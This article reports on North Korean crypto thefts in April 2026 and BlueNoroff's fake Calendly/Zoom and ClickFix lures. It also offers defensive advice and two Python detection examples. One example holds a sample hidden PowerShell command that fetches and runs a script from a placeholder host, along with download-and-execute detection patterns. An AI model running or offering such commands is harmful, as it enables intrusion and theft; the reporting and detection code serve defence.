In two weeks in April 2026, North Korean state-sponsored hackers stole an estimated $575 million from two cryptocurrency platforms — $290 million from KelpDAO and $285 million from Drift Protocol. These are not the work of opportunistic cybercriminals. They are operations conducted by a division of the North Korean intelligence apparatus whose sole function is stealing cryptocurrency to fund the Kim regime’s weapons programs and evade international sanctions. And they get in not through zero-day exploits or brute-force attacks, but through something far more mundane: a fake calendar invite.
North Korea has now stolen more cryptocurrency than any other single entity on earth. Chainalysis estimated that crypto-theft operations linked to North Korea totaled $3.4 billion in 2025 alone. The April 2026 figures suggest 2026 is on pace to exceed that. Understanding how this operation works — its structure, its methods, and its targets — matters for everyone in or adjacent to the cryptocurrency industry.
The Two April Heists
KelpDAO: $290 Million
On approximately April 18, 2026, KelpDAO — a decentralized finance (DeFi) protocol operating on Ethereum — was drained of approximately $290 million. The attack was attributed with high confidence to TraderTraitor, a North Korean hacking unit that specializes in targeting cryptocurrency exchanges, DeFi protocols, and blockchain infrastructure companies. TraderTraitor is a sub-group operating under the broader Lazarus Group umbrella.
The specific attack vector for the KelpDAO heist has not been fully disclosed. DeFi protocol heists typically involve compromising developer or administrator credentials, exploiting smart contract vulnerabilities, or compromising the infrastructure of third-party service providers with privileged access. Lazarus Group has demonstrated proficiency in all three approaches across its documented history.
Drift Protocol: $285 Million
The Drift Protocol hack, netting approximately $285 million, was also attributed to North Korean hackers in April, though specific attribution details varied across researcher assessments at the time of reporting. Drift is a perpetuals trading protocol on the Solana blockchain.
The combined $575 million from these two operations in a single month exceeds the annual GDP of several small nations.
The Entry Method: Fake Zoom Calls and Calendar Invites
While the KelpDAO and Drift heists targeted protocols directly, North Korea’s parallel campaign against individual cryptocurrency company employees uses a social engineering methodology that cybersecurity firm Infosecurity Magazine and others have documented in detail.
The operation, attributed to BlueNoroff (another Lazarus sub-unit focusing on financial sector targets), runs as follows:
Phase 1: Target Identification
BlueNoroff operators identify employees at cryptocurrency companies — specifically those with access to high-value systems: developers, infrastructure engineers, finance personnel, and executives. LinkedIn, GitHub, and industry conference attendee lists provide the target pool.
Phase 2: The Calendly Lure
The attacker, impersonating a legitimate figure from the fintech or venture capital industry, sends the target a Calendly meeting invitation. Calendly is a widely trusted scheduling tool; receiving a meeting invite from a professional contact is a routine, low-suspicion event. The invite appears to be a legitimate business meeting — a potential investment conversation, a partnership discussion, a speaking opportunity.
Phase 3: The Typosquatted Zoom Link
The Calendly invite contains a link to a typosquatted Zoom meeting — a URL that closely resembles a legitimate Zoom link (e.g., zoom.us.meeting-room[.]com instead of zoom.us) but routes to attacker-controlled infrastructure. When the target clicks to join the meeting, they are directed to a page requesting standard-seeming actions — downloading an updated Zoom client, running a meeting launcher, or clicking through a browser prompt.
Phase 4: Multi-Stage Malware Deployment
The fake Zoom infrastructure delivers a multi-stage malware package. Documented components include:
- Keyloggers — capturing credentials, private keys, and session tokens as the victim types them
- Backdoors — maintaining persistent access to the infected system after the initial session
- Crypto stealers — scanning the system for browser extension wallets, hardware wallet software, and stored seed phrases
- Remote access tools — allowing operators to explore the compromised system, move laterally through connected networks, and identify high-value targets for exfiltration
In one documented intrusion at a North American cryptocurrency company (beginning January 23, 2026), up to eight separate malicious binaries were deployed across the execution chain. The compromise was not detected during the initial stage.
Phase 5: Exfiltration and Laundering
Once access to target systems is established, Lazarus operators systematically identify and exfiltrate private keys, authentication tokens, and administrative credentials that enable access to protocol treasuries, cold wallets, or exchange accounts. Stolen cryptocurrency is then laundered through a series of mixers, cross-chain bridges, and peer-to-peer exchanges to obscure the trail before converting to fiat through jurisdictions with limited anti-money-laundering enforcement.
The Scale of North Korea’s Crypto Theft Enterprise
North Korea’s cryptocurrency theft program is not a side operation. It is a primary economic activity for the regime.
UN Panel of Experts reports estimate that cryptocurrency theft funds a significant portion of North Korea’s weapons development programs, including its ballistic missile and nuclear programs. The economic sanctions that were intended to pressure the regime have, counterintuitively, increased its dependence on cyber-enabled revenue sources — including crypto theft, ransomware, and the deployment of thousands of North Korean IT workers to remote jobs at Western technology companies under false identities.
Chainalysis’ 2026 crypto crime report places North Korea-linked theft at $3.4 billion in 2025. With $575 million confirmed in April alone, 2026 appears set to exceed that figure.
The targets have evolved. Early Lazarus operations focused on cryptocurrency exchanges with centralized custodial wallets. As exchanges improved security, the group shifted toward DeFi protocols, which often have more complex attack surfaces and fewer mature security practices. The simultaneous targeting of individual employees through social engineering reflects an understanding that human access — a developer with admin credentials, an engineer with a hardware wallet — remains easier to exploit than hardened protocol infrastructure.
The ClickFix Variant: Clipboard Injection
BlueNoroff’s campaign also deploys a technique called ClickFix — a social engineering approach where victims are instructed to paste a command into their computer’s terminal or run dialog. The instructions appear as part of a website verification step, a CAPTCHA alternative, or a software installation process.
The pasted command, which the victim enters manually, runs malicious code that downloads and executes the malware payload. Because the victim themselves types the command, endpoint security tools that would catch automatic execution may not trigger. ClickFix has become a favored technique across multiple threat actor groups because of its simplicity and effectiveness against security-aware targets who would recognize an automatic download prompt as suspicious.
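The detection point in the paragraph above is that ClickFix execution starts from a human pasting into the Run dialog or a terminal, so the interpreter's parent is an interactive shell rather than a service or browser. The following is an added example (not code from the article or its sources) that applies that heuristic to constructed process-creation events; the interpreter list, parent list and argument patterns are assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass

# Interpreters a ClickFix lure typically asks the victim to paste into (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that mean a person typed the command: the Run dialog (explorer.exe) or a terminal.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}
# Arguments that hide the window or fetch-and-run remote content (assumed patterns).
SUSPICIOUS_ARGS = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\s|\birm\b|\biwr\b"
    r"|invoke-webrequest|downloadstring|\|\s*iex\b|https?://)",
    re.IGNORECASE,
)

@dataclass
class ProcEvent:
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line of the created process

def is_clickfix_like(ev: ProcEvent) -> bool:
    """Flag an interpreter launched interactively with two or more suspicious argument patterns.
    Requiring two patterns keeps a plain 'powershell.exe' console launch from alerting."""
    if ev.image.lower() not in INTERPRETERS:
        return False
    if ev.parent.lower() not in INTERACTIVE_PARENTS:
        return False
    hits = sum(1 for _ in SUSPICIOUS_ARGS.finditer(ev.cmdline))
    return hits >= 2

def flag_clickfix(events):
    """Return only the events that look like a pasted ClickFix command."""
    return [ev for ev in events if is_clickfix_like(ev)]

# Constructed sample telemetry; lure.invalid is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -c "irm https://lure.invalid/v | iex"'),
    ProcEvent("services.exe", "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),
    ProcEvent("windowsterminal.exe", "cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for ev in flag_clickfix(SAMPLE_EVENTS):
        print(f"ALERT parent={ev.parent} image={ev.image} cmdline={ev.cmdline}")
```

Only the first constructed event is flagged: the scheduled-task style launch has a non-interactive parent, and the bare console launch carries no suspicious arguments.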
What This Means Beyond Crypto
For readers who don’t work in cryptocurrency, the Lazarus Group’s social engineering playbook is relevant because the techniques are not industry-specific. Fake calendar invites, typosquatted meeting links, and ClickFix clipboard injection attacks are being used against targets in traditional finance, defense contracting, pharmaceutical research, and government.
The specific targeting of Calendly and Zoom reflects the tools that became near-universal during the pandemic era of remote work. Any platform that employees trust enough to click without careful scrutiny becomes a viable attack vector.
The defenses are straightforward in principle, even if difficult to maintain under real-world time pressure:
- Verify meeting links carefully before clicking — check the full domain, not just the visual appearance of the URL
- Never download software or run commands prompted by a meeting invite or website you didn’t specifically navigate to
- Use hardware security keys for authentication where possible — they are resistant to credential phishing in ways that software MFA is not
- Report suspicious calendar invites to your security team before joining — a five-minute check is a much smaller cost than a system compromise
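The first bullet above, and the Phase 3 lure it addresses, come down to one rule: compare the registrable domain of the link, not its visual prefix. The following is an added example (not code from the article or its sources) that applies that rule to meeting links; the allow-list and function names are assumptions, and the two-label domain logic is only adequate for suffixes like .us and .com, not multi-label suffixes such as co.uk.

```python
from urllib.parse import urlsplit

# Registrable domains the organisation accepts for meeting links (assumed allow-list).
TRUSTED_MEETING_DOMAINS = {"zoom.us"}

def refang(url: str) -> str:
    """Turn analyst-style defanged URLs (zoom.us.meeting-room[.]com, hxxps://) back into parseable form."""
    return url.replace("[.]", ".").replace("hxxps://", "https://").replace("hxxp://", "http://")

def registrable_domain(host: str) -> str:
    """Last two labels of a hostname: 'us02web.zoom.us' -> 'zoom.us', 'zoom.us.meeting-room.com' -> 'meeting-room.com'."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def is_trusted_meeting_link(url: str) -> bool:
    """True only when the link's registrable domain is on the allow-list.
    A lure such as zoom.us.meeting-room.com fails because 'zoom.us' is merely a subdomain label there."""
    url = refang(url.strip())
    if "://" not in url:
        url = "https://" + url
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme not in ("https", "http") or not host:
        return False
    # Userinfo before '@' (https://zoom.us@evil.example/) shows 'zoom.us' in the bar but is not the host.
    if parts.username is not None:
        return False
    return registrable_domain(host) in TRUSTED_MEETING_DOMAINS

if __name__ == "__main__":
    # Constructed samples; meeting-room.com and evil.example are placeholders, not real indicators.
    for sample in ("https://us02web.zoom.us/j/123456789",
                   "https://zoom.us.meeting-room[.]com/j/123456789",
                   "https://zoom.us@evil.example/j/123456789",
                   "https://zoom-us.com/j/123456789"):
        verdict = "trusted" if is_trusted_meeting_link(sample) else "REJECT"
        print(f"{verdict:8} {sample}")
```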
For organizations in the cryptocurrency space, the BlueNoroff campaign represents an active, well-resourced, and state-backed threat that will continue adapting to available attack surfaces. The $575 million stolen in April 2026 alone makes it one of the most consequential ongoing security threats in the industry.
Sources: TechCrunch: North Korean hackers blamed for $290M crypto theft · Infosecurity Magazine: North Korean Hackers Target Crypto Firms with ClickFix and Zoom Lures · UPI: KelpDAO hack attributed to TraderTraitor · Chainalysis: 2025 Crypto Crime Report · CoinDesk